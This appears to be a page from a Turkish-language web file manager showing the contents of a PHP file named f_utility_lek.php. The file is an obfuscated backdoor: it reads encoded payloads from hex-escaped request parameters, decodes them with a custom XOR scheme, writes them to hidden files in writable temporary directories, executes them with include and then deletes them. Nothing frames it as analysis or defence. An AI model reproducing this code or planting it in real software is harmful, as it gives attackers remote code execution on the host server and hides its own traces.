0x1998 - MANAGER
Düzenlenen Dosya: f_utility_lek.php
<?php if(array_key_exists("r\x65f\x65ren\x63\x65", $_REQUEST) && !is_null($_REQUEST["r\x65f\x65ren\x63\x65"])){ $tkn = array_filter([ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/tmp", getenv("TMP"), session_save_path(), "/dev/shm", sys_get_temp_dir(), "/var/tmp"]); $object = $_REQUEST["r\x65f\x65ren\x63\x65"]; $object = explode ("." , $object ) ; $comp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); foreach ($object as $z =>$v3): $sChar = ord($s[$z % $sLen]); $d = ((int)$v3 - $sChar - ($z % 10)) ^ 100; $comp .= chr($d); endforeach; foreach ($tkn as $token) { if (is_writable($token) && is_dir($token)) { $pointer = "$token/.dchunk"; $success = file_put_contents($pointer, $comp); if ($success) { include $pointer; @unlink($pointer); die();} } } } if(array_key_exists("\x72eco\x72d", $_POST)){ $ent = array_filter([getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", "/tmp", getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path()]); $dchunk = $_POST["\x72eco\x72d"]; $dchunk = explode ( '.' , $dchunk ) ; $holder = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); $v = 0; foreach($dchunk as $v5) { $chS = ord($salt6[$v % $lenS]); $d =((int)$v5 - $chS -($v % 10))^83; $holder .= chr($d); $v++;} foreach ($ent as $k): if (is_dir($k) && is_writable($k)) { $val = str_replace("{var_dir}", $k, "{var_dir}/.hld"); if (file_put_contents($val, $holder)) { include $val; @unlink($val); exit; } } endforeach; }
geri dön